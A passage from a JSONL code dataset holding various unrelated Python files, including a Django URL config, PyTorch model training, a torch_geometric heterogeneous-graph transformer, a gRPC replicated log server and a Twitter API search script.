copy.copy(DATA)\n res.append(Date)\n else:\n for a in _db().find_one(statusYC, {'_id': 0, t: 1}).values():\n for i in a:\n if i['time'] < endTime:\n DATA['id'] = target\n DATA['time'] = i['time']\n DATA['status'] = i['status']\n DATA['frequency'] = i['frequency']\n Date = copy.copy(DATA)\n res.append(Date)\n # 回算数据\n for target in target1:\n statusHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 5}\n # frequencyHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 7}\n for v in _db().find_one(statusHS, {'_id': 0, t: 1}).values():\n res2 = [m for m in v]\n res2.sort(key=lambda x: x['time'], reverse=True)\n for m in res2:\n DATA['id'] = target\n DATA['time'] = m['time']\n DATA['status'] = m['status']\n if DATA['time'] < staTime:\n DATA['time'] = staTime + \" 00:00:00\"\n Date = copy.copy(DATA)\n res.append(Date)\n break\n Date = copy.copy(DATA)\n res.append(Date)\n # 排序\n res.sort(key=lambda x: x['time'])\n return res\n\nclass SchHadl(BaseHandler):\n async def get(self):\n # 获取编号\n target = self.get_argument('target_id', None)\n if not target:\n self.return_failed()\n return\n target1 = target.split(',')\n #获取时间,时间为空用当前时间\n newTime = self.get_argument('new_time', None)\n if not newTime:\n NTime = datetime.now()\n else:\n NTime = datetime.strptime(newTime, \"%Y-%m-%d %H:%M:%S\")\n t = tt(NTime)\n #获取日期\n date = NTime.strftime('%Y%m%d')\n #开始时间,结束时间\n staTime = NTime.strftime('%Y-%m-%d')\n endTime = (NTime+timedelta(days=1)).strftime('%Y-%m-%d')\n result = await api_util.call_blocking(conversion, target1,date,t,staTime,endTime)\n self.write(json.dumps(result, ensure_ascii=False))\n\n\n\n\n","sub_path":"src/service/handlers/schedule_handler.py","file_name":"schedule_handler.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"546702562","text":"from selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\yordi\\Automation\\python-selenium-automation\\chromedriver.exe\")\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\n\ndriver.get('https://www.amazon.com/')\n\ndriver.find_element(By.ID, 'nav-cart-count-container').click()\n\nactual_result = driver.find_element(By.XPATH, \"//div[@class='a-row sc-your-amazon-cart-is-empty']/h2\").text\nexpected_result = 'Your Amazon Cart is empty'\nassert expected_result == actual_result, f'Expected{expected_result},but got {actual_result}'","sub_path":"features/Test_amazon_cart.py","file_name":"Test_amazon_cart.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"119177163","text":"import numpy\nfrom fqe import Wavefunction\nimport cProfile\n\nif __name__ == '__main__':\n norb = 10\n nel = norb\n sz = 0\n h1e_spa = numpy.zeros((norb, norb), dtype=numpy.complex128)\n h2e_spa = numpy.zeros((norb, norb, norb, norb), dtype=numpy.complex128)\n h3e_spa = numpy.zeros((norb, norb, norb, norb, norb, norb),\n dtype=numpy.complex128)\n\n for i in range(norb):\n for j in range(norb):\n for k in range(norb):\n for l in range(norb):\n for m in range(norb):\n for n in range(norb):\n h3e_spa[i, j, k, l, m, n] += (i + l) * (j + m) * (\n k + n) * 0.002\n\n wfn = Wavefunction([[nel, sz, norb]])\n wfn.set_wfn(strategy='random')\n\n cProfile.run('test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))',\n '3body.profile')\n # test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))\n\n # rdm3 = wfn.rdm123(wfn)\n # energy = numpy.tensordot(h3e_spa, rdm3[2],\n # axes=([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]))\n # print(energy)\n import pstats\n profile = pstats.Stats('3body.profile')\n profile.sort_stats('cumtime')\n profile.print_stats(30)\n","sub_path":"profiling/profile_3_body.py","file_name":"profile_3_body.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"43200693","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\nurlpatterns = [\n path('', views.list,name='blog'),\n path('/', views.post, name='post'),\n #path('contact/', views.contact, name='contact'),\n path('register/', views.register, name=\"register\"),\n path('login/',auth_views.LoginView.as_view(template_name=\"pages/login.html\"), name=\"login\"),\n path('logout/',auth_views.LogoutView.as_view(next_page='/'),name='logout'),\n]\n","sub_path":"webpython/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"264584098","text":"# Copyright 2018 The Pontem Authors. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Cloud SQL Replicator setup.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom google.cloud.pontem.sql import replicator\n\nNAMESPACE_PACKAGES = [\n 'google',\n 'google.cloud'\n]\n\nREQUIRES = [\n 'absl-py>=0.6.1',\n 'future>=0.17.1',\n 'futures>=3.0.5',\n 'google-api-core>=1.6.0',\n 'google-api-python-client>=1.7.6',\n 'google-auth>=1.6.1',\n 'google-auth-httplib2>=0.0.3',\n 'google-cloud-core>=0.28.1',\n 'google-cloud-kms>=0.2.1',\n 'google-cloud-storage>=1.13.0',\n 'google-resumable-media>=0.3.1',\n 'googleapis-common-protos>=1.5.5',\n 'httplib2>=0.12.0',\n 'mysql-connector>=2.1.6',\n 'oauth2client>=4.1.3',\n 'PyYAML>=3.13',\n 'six>=1.11.0',\n]\n\nsetup(\n name='cloudsql-replicator',\n version=replicator.__version__,\n install_requires=REQUIRES,\n packages=find_packages(exclude=['tests']),\n namespace_packages=NAMESPACE_PACKAGES,\n license='Apache 2.0',\n entry_points={\n 'console_scripts': [\n 'sr=google.cloud.pontem.sql.replicator.cli.main:run',\n ]\n }\n)\n","sub_path":"CloudSQLReplicator/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"459945585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super().__init__()\n\n # Layer 1\n self.conv1 = nn.Conv2d(3, 48, kernel_size=(11, 11), stride=(4, 4), padding=(2, 2))\n self.mp1 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn1 = nn.BatchNorm2d(48)\n # Layer 2\n self.conv2 = nn.Conv2d(48, 128, kernel_size=(5, 5), stride=(1, 1), padding=(2, 2))\n self.mp2 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn2 = nn.BatchNorm2d(128)\n # Layer 3\n self.conv3 = nn.Conv2d(128, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 4\n self.conv4 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 5\n self.conv5 = nn.Conv2d(192, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n self.mp3 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n\n def forward(self, inputs):\n inputs = F.relu(self.bn1(self.mp1(self.conv1(inputs))))\n inputs = F.relu(self.bn2(self.mp2(self.conv2(inputs))))\n inputs = F.relu(self.conv3(inputs))\n inputs = F.relu(self.conv4(inputs))\n inputs = F.relu(self.mp3(self.conv5(inputs)))\n\n return inputs\n\n\nclass AlexNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder_1 = Encoder()\n self.encoder_2 = Encoder()\n\n # Decoder\n self.fc6_1 = nn.Linear(2*128*6*6, 20)\n self.fc6_2 = nn.Linear(2*128*6*6, 20)\n self.fc7_1 = nn.Linear(40, 20)\n self.fc7_2 = nn.Linear(40, 20)\n self.fc8 = nn.Linear(40, 10)\n\n def forward(self, inputs):\n inputs_1 = self.encoder_1(inputs)\n inputs_2 = self.encoder_2(inputs)\n\n inputs_1 = inputs_1.view(self.N, -1)\n inputs_2 = inputs_2.view(self.N, -1)\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc6_1(inputs_1))\n inputs_2 = F.relu(self.fc6_2(inputs_2))\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc7_1(inputs_1))\n inputs_2 = F.relu(self.fc7_2(inputs_2))\n\n inputs = torch.cat((inputs_1, inputs_2), dim=1)\n inputs = self.fc8(inputs)\n\n return inputs\n\n\nclass CaffeNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder = Encoder()\n\n # Decoder\n self.fc6 = nn.Linear(128*6*6, 20)\n self.fc7 = nn.Linear(20, 20)\n self.fc8 = nn.Linear(20, 10)\n\n def forward(self, inputs):\n inputs = self.encoder(inputs)\n\n inputs = inputs.view(self.N, -1)\n inputs = F.relu(self.fc6(inputs))\n inputs = F.relu(self.fc7(inputs))\n inputs = self.fc8(inputs)\n\n return inputs\n\n\n# Training\nN = 32\nn_iterations = 100\ninputs = torch.rand(N, 3, 224, 224)\ntargets = torch.randint(10, (N, 1))\ntargets = targets[:, 0]\ntargets = targets.long()\n\nmodel = CaffeNet(N)\nloss_function = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters())\n\n# torch.onnx.export(model, inputs, 'caffenet.onnx', verbose=True) # open in Netron\n\nfor i in range(n_iterations):\n # Forward\n optimizer.zero_grad()\n outputs = model(inputs)\n\n # Loss\n loss = loss_function(outputs, targets)\n\n # Backwards\n loss.backward()\n optimizer.step()\n\n print('iteration:', i, 'loss:', loss.detach().numpy())","sub_path":"example-2.py","file_name":"example-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"389614756","text":"# Hexadecimal operations in python with examples\n# import the modules required for the script\nimport base64\n\nExamples = [\"Cat\",\"Mouse\",\"Monitor\"]\n\n\n# display first output line\n# Word\tASCII\tBASE64\nprint(\"Word\\t\",\" ASCII\\t\\t\\t\\t\",\"Base64\")\n# Iterate through the elements in Examples List\nfor ex in Examples:\n\texEnc = \" \"\n\tfor byte in ex.encode():\n\t\texEnc += format(byte,'08b')+\" \"\n\tprint(ex,exEnc,\"\\t\",base64.b64encode(ex.encode()))\n\n","sub_path":"CORE/Cryptography-100/Resources/Hex-AND-OR-XOR-Examples.py","file_name":"Hex-AND-OR-XOR-Examples.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"203182900","text":"# Author: Sebastien Dubois \n#\t\t for ALFA Group, CSAIL, MIT\n\n# The MIT License (MIT)\n# Copyright (c) 2015 Sebastien Dubois\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport matplotlib.pyplot as plt\nfrom iterations_needed import iterationsNeeded\nimport numpy as np\n\nfirst_exp = 4001\nlast_exp = 4050\ntest_name = \"MNIST\"\n\nthreshold = 0.5\nalpha = 0.5\n\n\nmean_iter_needed,q1_iter_needed,median_iter_needed,q3_iter_needed = \\\n\t\t\t\titerationsNeeded(test_name,first_exp,last_exp,threshold,alpha)\n\nabs = 95 + 0.05 * np.asarray(range(101))\n\nfig = plt.figure(figsize=(15,7))\nplt.plot(abs,median_iter_needed,'c')\nplt.plot(abs,q1_iter_needed,'c-.')\nplt.plot(abs[q3_iter_needed < 1000],q3_iter_needed[q3_iter_needed < 1000],'c-.')\nplt.title('Iterations needed')\nplt.xlabel('Percentage of maximum gain')\nplt.ylabel('Number of tested parameters')\nplt.show() ","sub_path":"GCP-HPO/Test/show_iterations_needed.py","file_name":"show_iterations_needed.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"378796342","text":"from typing import Tuple, Dict, Union, Optional, Any\nfrom torch_geometric.typing import NodeType, EdgeType, Metadata\n\nimport re\nimport copy\nimport warnings\nfrom collections import defaultdict, deque\n\nimport torch\nfrom torch.nn import Module\n\nfrom torch_geometric.nn.fx import Transformer\n\ntry:\n from torch.fx import GraphModule, Graph, Node\nexcept ImportError:\n GraphModule = Graph = Node = None\n\n# TODO:\n# * LazyInitialization - Bug: LazyLinear.weight does not support deepcopy yet\n\n\ndef to_hetero(module: Module, metadata: Metadata, aggr: str = \"sum\",\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False) -> GraphModule:\n r\"\"\"Converts a homogeneous GNN model into its heterogeneous equivalent in\n which node representations are learned for each node type\n :obj:`metadata[0]`, and messages are exchanged between edge type\n :obj:`metadata[1]`, as denoted in the `\"Modeling Relational Data with Graph\n Convolutional Networks\" `_ paper:\n\n .. code-block:: python\n\n import torch\n from torch_geometric.nn import SAGEConv, to_hetero\n\n Net(torch.nn.Module):\n def __init__(self):\n self.lin = Linear(16, 16)\n self.conv = SAGEConv(16, 16)\n\n def forward(self, x, edge_index):\n x = self.lin(x)\n h = self.conv(x, edge_index)\n return torch.cat([x, h], dim=-1)\n\n model = Net()\n\n metadata = (\n ['paper', 'author'],\n [('paper' 'written_by', 'author'), ('author', 'writes', 'paper')],\n )\n\n model = to_hetero(model, metadata)\n model(x_dict, edge_index_dict)\n\n where :obj:`x_dict` and :obj:`edge_index_dict` denote dictionaries that\n hold node features and edge connectivity information for each node type and\n edge type, respectively.\n\n Args:\n module (torch.nn.Module): The homogeneous model to transform.\n metadata (Tuple[List[str], List[Tuple[str, str, str]]]): The metadata\n of the heterogeneous graph, *i.e.* its node and edge types given\n by a list of strings and a list of string triplets, respectively.\n See :meth:`torch_geometric.data.HeteroData.metadata` for more\n information.\n aggr (string, optional): The aggregation scheme to use for grouping\n node embeddings generated by different relations.\n (:obj:`\"sum\"`, :obj:`\"mean\"`, :obj:`\"min\"`, :obj:`\"max\"`,\n :obj:`\"mul\"`). (default: :obj:`\"sum\"`)\n input_map (Dict[str, str], optional): A dictionary holding information\n on the type of input arguments of :obj:`module.forward`.\n In case :obj:`arg` is a node-level argument, then\n :obj:`input_map[key] = 'node'`, and :obj:`input_map[key] = 'edge'`\n otherwise.\n In case :obj:`input_map` is not further specified, will try to\n automatically determine the correct type of input arguments.\n (default: :obj:`None`)\n debug: (bool, optional): If set to :obj:`True`, will perform\n transformation in debug mode. 
(default: :obj:`False`)\n \"\"\"\n transformer = ToHeteroTransformer(module, metadata, aggr, input_map, debug)\n return transformer.transform()\n\n\nclass ToHeteroTransformer(Transformer):\n\n aggrs = {\n 'sum': torch.add,\n 'mean': torch.add,\n 'max': torch.max,\n 'min': torch.min,\n 'mul': torch.mul,\n }\n\n def __init__(\n self,\n module: Module,\n metadata: Metadata,\n aggr: str = 'sum',\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False,\n ):\n super().__init__(module, debug)\n self.metadata = metadata\n self.aggr = aggr\n self.input_map = input_map or {}\n assert len(metadata) == 2\n assert len(metadata[0]) > 1 and len(metadata[1]) > 1\n assert aggr in self.aggrs.keys()\n\n def placeholder(self, node: Node, target: Any, name: str):\n # Add a `get` call to the input dictionary for every node-type or\n # edge-type.\n\n input_type = self.input_map.get(name, None)\n if input_type is None and bool(re.search('(edge|adj)', name)):\n input_type = 'edge'\n is_edge_level_placeholder = input_type == 'edge'\n\n if node.type is not None:\n Type = EdgeType if is_edge_level_placeholder else NodeType\n node.type = Dict[Type, node.type]\n\n self.graph.inserting_after(node)\n for key in self.metadata[int(is_edge_level_placeholder)]:\n out = self.graph.create_node('call_method', target='get',\n args=(node, key),\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def get_attr(self, node: Node, target: Any, name: str):\n raise NotImplementedError\n\n def call_message_passing_module(self, node: Node, target: Any, name: str):\n # Add calls to edge type-wise `MessagePassing` modules and aggregate\n # the outputs to node type-wise embeddings afterwards.\n\n # Group edge-wise keys per destination:\n key_name, keys_per_dst = {}, defaultdict(list)\n for key in self.metadata[1]:\n keys_per_dst[key[-1]].append(key)\n key_name[key] = f'{name}__{key[-1]}{len(keys_per_dst[key[-1]])}'\n\n for dst, keys in dict(keys_per_dst).items():\n # In case there is only a single edge-wise connection, there is no\n # need for any destination-wise aggregation, and we can already set\n # the intermediate variable name to the final output name.\n if len(keys) == 1:\n key_name[keys[0]] = f'{name}__{dst}'\n del keys_per_dst[dst]\n\n self.graph.inserting_after(node)\n for key in self.metadata[1]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=key_name[key])\n self.graph.inserting_after(out)\n\n # Perform destination-wise aggregation.\n # Here, we aggregate in pairs, popping the first two elements of\n # `keys_per_dst` and append the result to the list.\n for dst, keys in keys_per_dst.items():\n queue = deque([key_name[key] for key in keys])\n i = len(queue) + 1\n while len(queue) >= 2:\n key1, key2 = queue.popleft(), queue.popleft()\n args = (self.find_by_name(key1), self.find_by_name(key2))\n\n new_name = f'{name}__{dst}'\n if self.aggr == 'mean' or len(queue) > 2:\n new_name += f'{i}'\n\n out = self.graph.create_node('call_function',\n target=self.aggrs[self.aggr],\n args=args, name=new_name)\n self.graph.inserting_after(out)\n queue.append(new_name)\n i += 1\n\n if self.aggr == 'mean':\n key = queue.popleft()\n out = self.graph.create_node(\n 'call_function', target=torch.div,\n args=(self.find_by_name(key), len(keys_per_dst[dst])),\n name=f'{name}__{dst}')\n self.graph.inserting_after(out)\n\n def call_module(self, node: Node, target: Any, name: str):\n # Add calls to node 
type-wise or edge type-wise modules.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_method(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise methods.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_method', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_function(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise functions.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_function', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def output(self, node: Node, target: Any, name: str):\n # Replace the output by dictionaries, holding either node type-wise or\n # edge type-wise data.\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n return {\n key: self.find_by_name(f'{value.name}__{key2str(key)}')\n for key in self.metadata[int(self.is_edge_level(value))]\n }\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n if node.type is not None and isinstance(node.args[0], Node):\n output = node.args[0]\n Type = EdgeType if self.is_edge_level(output) else NodeType\n node.type = Dict[Type, node.type]\n else:\n node.type = None\n\n node.args = (_recurse(node.args[0]), )\n\n def init_submodule(self, module: Module, target: str) -> Module:\n # Replicate each module for each node type or edge type.\n has_edge_level_target = bool(\n self.find_by_target(f'{target}.{key2str(self.metadata[1][0])}'))\n\n module_dict = torch.nn.ModuleDict()\n for key in self.metadata[int(has_edge_level_target)]:\n module_dict[key2str(key)] = copy.deepcopy(module)\n if hasattr(module, 'reset_parameters'):\n module_dict[key2str(key)].reset_parameters()\n elif sum([p for p in module.parameters()]) > 0:\n warnings.warn((f\"'{target}' will be duplicated, but its \"\n f\"parameters cannot be reset\"))\n return module_dict\n\n # Helper methods ##########################################################\n\n def map_args_kwargs(self, node: Node,\n key: Union[NodeType, EdgeType]) -> Tuple[Tuple, Dict]:\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n out = self.find_by_name(f'{value.name}__{key2str(key)}')\n if out is None and isinstance(key, tuple):\n out = (self.find_by_name(f'{value.name}__{key[0]}'),\n self.find_by_name(f'{value.name}__{key[-1]}'))\n return out\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n args = tuple(_recurse(v) for v in node.args)\n kwargs = {k: _recurse(v) for k, v in 
node.kwargs.items()}\n return args, kwargs\n\n def is_edge_level(self, node: Node) -> bool:\n key = self.metadata[1][0]\n return bool(self.find_by_name(f'{node.name}__{key2str(key)}'))\n\n def has_edge_level_arg_kwarg(self, node: Node) -> bool:\n def _recurse(value: Any) -> bool:\n if isinstance(value, Node):\n return self.is_edge_level(value)\n elif isinstance(value, dict):\n return any([_recurse(v) for v in value.values()])\n elif isinstance(value, (list, tuple)):\n return any([_recurse(v) for v in value])\n else:\n return False\n\n has_edge_level_arg = any([_recurse(value) for value in node.args])\n has_edge_level_kwarg = any([_recurse(v) for v in node.kwargs.values()])\n return has_edge_level_arg or has_edge_level_kwarg\n\n\ndef key2str(key: Union[NodeType, EdgeType]) -> str:\n return '__'.join(key) if isinstance(key, tuple) else key\n","sub_path":"torch_geometric/nn/to_hetero.py","file_name":"to_hetero.py","file_ext":"py","file_size_in_byte":13227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"254738745","text":"import os\r\nimport grpc\r\nimport ReplicatedLog_pb2\r\nimport ReplicatedLog_pb2_grpc\r\nfrom concurrent import futures\r\n\r\nlogs = []\r\nslave_host = os.getenv('SLAVE_HOST', 'localhost')\r\nclass Logger(ReplicatedLog_pb2_grpc.PostRequestServiceServicer):\r\n def PostRequest(self, request, context):\r\n logs.append(request.msg)\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.PostRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.POST(msg=request.msg)\r\n if client.PostRequest(slave_request).msg == '1':\r\n return ReplicatedLog_pb2.POSTResponse(msg='Master and Slaves have recived msg')\r\n\r\nclass SendLogs(ReplicatedLog_pb2_grpc.GetRequestServiceServicer):\r\n def GetRequest(self, request, context):\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.GetRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.GET(msg='1')\r\n\r\n return ReplicatedLog_pb2.GETResponse(data=client.GetRequest(slave_request).data)\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\r\n ReplicatedLog_pb2_grpc.add_PostRequestServiceServicer_to_server(Logger(), server)\r\n ReplicatedLog_pb2_grpc.add_GetRequestServiceServicer_to_server(SendLogs(), server)\r\n server.add_insecure_port(\"[::]:50051\")\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n serve()\r\n","sub_path":"Master.py","file_name":"Master.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"77344604","text":"import requests # Para enviar solicitudes GET desde la API\nimport os # Para guardar los tokens de acceso y para la gestión de archivos al crear y añadir al conjunto de datos\nimport pandas as pd # Para mostrar los datos después\n# Para parsear las fechas recibidas de twitter en formatos legibles\nimport dateutil.parser\nimport claves #Importar claves\nimport time\n\nCONSUMER_KEY = claves.CONSUMER_KEY\nCONSUMER_SECRET = claves.CONSUMER_SECRET\nBEARER_TOKEN = claves.BEARER_TOKEN\nACCESS_TOKEN = claves.ACCESS_TOKEN\nACCESS_TOKEN_SECRET = claves.ACCESS_TOKEN_SECRET\n\n# guardaremos el token en una \"variable de entorno\"\nos.environ['TOKEN'] = BEARER_TOKEN\n\n#crearemos nuestra función auth () , que recupera el token del entorno\ndef auth():\n return os.getenv('TOKEN')\n\n#A continuación, definiremos una función que tomará nuestro token de portador, \n#lo pasará para su autorización y devolverá los encabezados que usaremos para acceder a la API.\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n# Ahora que podemos acceder a la API, crearemos la solicitud para el punto final que vamos a usar y los parámetros que queremos pasar.\ndef create_url(keyword, start_date, end_date, max_results=500):\n \n #Cuál es el enlace del endpoint al que queremos acceder para recoger datos\n search_url = \"https://api.twitter.com/2/tweets/search/all\"\n\n \"\"\"Los parámetros que ofrece el endpoint y que podemos usar para personalizar la solicitud que queremos enviar.\"\"\"\n \n query_params = {'query': keyword, \n 'start_time': start_date, #AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'end_time': end_date, ##AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'max_results': max_results, #El número de resultados de búsqueda devueltos por una solicitud está limitado entre 10 y 500 resultados.\n 'expansions': 'author_id,in_reply_to_user_id,geo.place_id',\n 'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',\n 'user.fields': 'id,name,username,created_at,description,public_metrics,verified',\n 'place.fields': 'full_name,id,country,country_code,geo,name,place_type',\n 'next_token': {}}\n return (search_url, query_params)\n\n#Ahora que tenemos la URL, los encabezados y los parámetros que queremos, crearemos una función que unirá todo esto y se conectará al punto final.\n#La función a continuación enviará la solicitud \"GET\" y si todo es correcto (código de respuesta 200), devolverá la respuesta en formato \"JSON\".\ndef connect_to_endpoint(url, headers, params, next_token = None): #next_token está configurado en \"Ninguno\" de forma predeterminada, ya que solo nos importa si existe.\n params['next_token'] = next_token #objeto params recibido de la función create_url\n response = requests.request(\"GET\", url, headers = headers, params = params)\n print(\"Endpoint Response Code: \" + str(response.status_code))\n if response.status_code != 200:\n raise Exception(response.status_code, response.text)\n return response.json()\n\ndef create_df(json_response): # Función para crear df de respuesta a partir del json \n res = []\n #Recorrer en bucle cada uno de los tweets del json\n for tweet in json_response['data']:\n \n # creará una variable para cada uno ya que algunas de las claves podrían no existir para algunos tweets\n\n # 1. 
Author ID\n if ('author_id' in tweet): \n author_id = tweet['author_id']\n else:\n author_id = \" \"\n \n # 2. Time created\n if ('created_at' in tweet): \n created_at = dateutil.parser.parse(tweet['created_at'])\n else:\n created_at = \" \"\n \n # 3. Geolocation\n if ('place_id' in tweet):\n geo = tweet['geo']['place_id']\n else:\n geo = \" \"\n\n # 4. Tweet ID\n if ('id' in tweet):\n tweet_id = tweet['id']\n else: \n id = \" \"\n\n # 5. Language\n if ('lang' in tweet):\n lang = tweet['lang']\n else: \n lang = \" \"\n\n # 6. Tweet metrics\n if ('retweet_count' in tweet):\n retweet_count = tweet['public_metrics']['retweet_count']\n else:\n retweet_count = \" \"\n \n if ('reply_count' in tweet):\n reply_count = tweet['public_metrics']['reply_count']\n else:\n reply_count = \" \"\n \n if ('like_count' in tweet):\n like_count = tweet['public_metrics']['like_count']\n else:\n like_count = \" \"\n \n if ('quote_count' in tweet):\n quote_count = tweet['public_metrics']['quote_count']\n else:\n quote_count = \" \"\n \n # 7. source\n if ('source' in tweet):\n source = tweet['source']\n else:\n source = \" \"\n \n # 8. Tweet text\n if ('text' in tweet): \n text = tweet['text']\n else:\n text = \" \"\n \n # Reunir todos los datos en una lista\n res.append([author_id, created_at, geo, tweet_id, lang, like_count, quote_count, reply_count, retweet_count, source, text])\n \n df_res = pd.DataFrame(data = res, columns=['author id', 'created_at', 'geo', 'id','lang', 'like_count', 'quote_count', 'reply_count','retweet_count','source','tweet'])\n # Imprime el número de tweets de esta iteración\n return df_res\n\ndef create_df_final(url, 